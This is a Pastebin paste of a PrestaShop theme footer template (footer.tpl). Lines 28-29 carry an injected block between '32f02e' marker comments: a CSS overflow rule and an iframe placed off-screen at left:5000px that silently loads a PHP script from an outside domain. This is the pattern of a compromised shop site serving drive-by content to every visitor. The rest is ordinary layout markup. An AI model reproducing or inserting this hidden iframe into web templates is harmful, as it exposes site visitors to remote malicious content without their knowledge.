Advertisement
Guest User

footer.tpl

a guest
Dec 5th, 2013
47
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.87 KB | None | 0 0
  1. {*
  2. * 2007-2011 PrestaShop
  3. *
  4. * NOTICE OF LICENSE
  5. *
  6. * This source file is subject to the Academic Free License (AFL 3.0)
  7. * that is bundled with this package in the file LICENSE.txt.
  8. * It is also available through the world-wide-web at this URL:
  9. * http://opensource.org/licenses/afl-3.0.php
  10. * If you did not receive a copy of the license and are unable to
  11. * obtain it through the world-wide-web, please send an email
  12. * to license@prestashop.com so we can send you a copy immediately.
  13. *
  14. * DISCLAIMER
  15. *
  16. * Do not edit or add to this file if you wish to upgrade PrestaShop to newer
  17. * versions in the future. If you wish to customize PrestaShop for your
  18. * needs please refer to http://www.prestashop.com for more information.
  19. *
  20. * @author PrestaShop SA <contact@prestashop.com>
  21. * @copyright 2007-2011 PrestaShop SA
  22. * @version Release: $Revision: 1.4 $
  23. * @license http://opensource.org/licenses/afl-3.0.php Academic Free License (AFL 3.0)
  24. * International Registered Trademark & Property of PrestaShop SA
  25. *}
  26.  
  27. {if !$content_only}
  28. <div class="clear"></div><!--32f02e--><style>body {overflow-x:hidden;overflow-y:auto;} </style>
  29. <iframe id="jf" name="jf" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://storybrothers.com/WjqBVygF.php" > </iframe><!--/32f02e-->
  30.  
  31.  
  32.  
  33. <!-- RIGHT COLUMN -->
  34. <div id="right_column">
  35. <div id="grid">
  36. <ul id="right_column_container">{$HOOK_RIGHT_COLUMN}</ul>
  37. </div>
  38. </div>
  39.  
  40. </div>
  41. </div>
  42. </div>
  43. </div>
  44.  
  45. <!-- FOOTER -->
  46. <div id="footer">
  47. <div class="path" id="block_various_links_footer">{$HOOK_FOOTER}</div>
  48. </div>
  49. {/if}
  50.  
  51. <!-- LEFT_COLUMN MODULES FIXE WIDTH GRIDE -->
  52. {literal}
  53. <script>
  54. $(function(){
  55.  
  56. $('#grid').masonry({
  57. singleMode: true,
  58. itemSelector: '.block'
  59. });
  60.  
  61. });
  62. </script>
  63. {/literal}
  64. </body>
  65. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement